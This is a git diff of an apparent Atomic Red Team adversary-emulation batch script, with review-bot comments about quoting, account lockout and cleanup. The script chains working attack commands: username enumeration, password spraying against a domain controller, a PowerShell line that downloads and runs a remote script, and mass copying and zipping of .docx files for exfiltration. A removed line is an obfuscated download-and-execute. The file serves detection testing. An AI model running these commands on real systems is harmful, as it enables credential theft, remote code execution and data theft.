diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
index de702686..1064f19f 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
@@ -7,18 +7,18 @@
 :: Single Endpoint
-:: for /F "tokens=1,2" %i in ('qwinsta /server: ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+:: for /F "tokens=1,2" %%i in ('qwinsta /server: ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
 :: Multiple Endpoints
-@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in (‘qwinsta /server:%n ^| findstr "Active Disc"’) do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc"’) do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
 :: Tactic: Credential Access, Lateral Movement
 :: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
 :: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
-@FOR /F %n in (usernames.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
+@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
 :: Tactic: Discovery
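Review bot: On the new Multiple Endpoints line the closing quote of the `FOR /F` set is still the typographic `’` while the opening one was changed to a straight `'`, so cmd will most likely not treat the set as a command and `usernames.txt` is never produced for the step that reads it. The closing character should match the opening one: `('qwinsta /server:%%n ^| findstr "Active Disc"')`. The `net use` loop in the same hunk tries every entry of `passwords.txt` against each account on `COMPANYDC1` and echoes the matching pair in clear text, and nothing documents the side effects. A comment such as `:: Run only in an isolated lab domain with test accounts; this loop can lock accounts out` above it would tell whoever runs the test what to expect.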
@@ -38,17 +38,12 @@ tasklist.exe | findstr defender
 powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
-:: Tactic: Execution
-:: Technique: Powershell: https://attack.mitre.org/wiki/Technique/T1086
-
-:: cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
-
 :: Tactic: Collection
 :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
-for /R c: %f in (*.docx) do copy %f c:\temp\
+for /R c: %%f in (*.docx) do copy %%f c:\temp\
 :: Tactic: Exfiltration
 :: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
-cmd.exe /c powershell.exe dir c:\temp -Recurse | Compress-Archive -DestinationPath C:\temp\allthedataz.zip
+cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
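Review bot: The rewritten `Compress-Archive` line writes `allthedataz.zip` into `C:\temp`, the same directory that `-Path C:\temp\*` reads from, and Compress-Archive refuses an existing destination unless `-Force` or `-Update` is given. A second run of the test therefore stops at this last step instead of producing the telemetry it is meant to exercise. No cleanup is visible in the hunk either, so the copies of every `.docx` found on `C:` and the archive stay behind in `c:\temp` on the test host. A closing comment such as `:: Cleanup after validation: remove the staged copies and allthedataz.zip from c:\temp` would make that obligation explicit, and staging into a directory created only for the test would keep the removal from touching unrelated files.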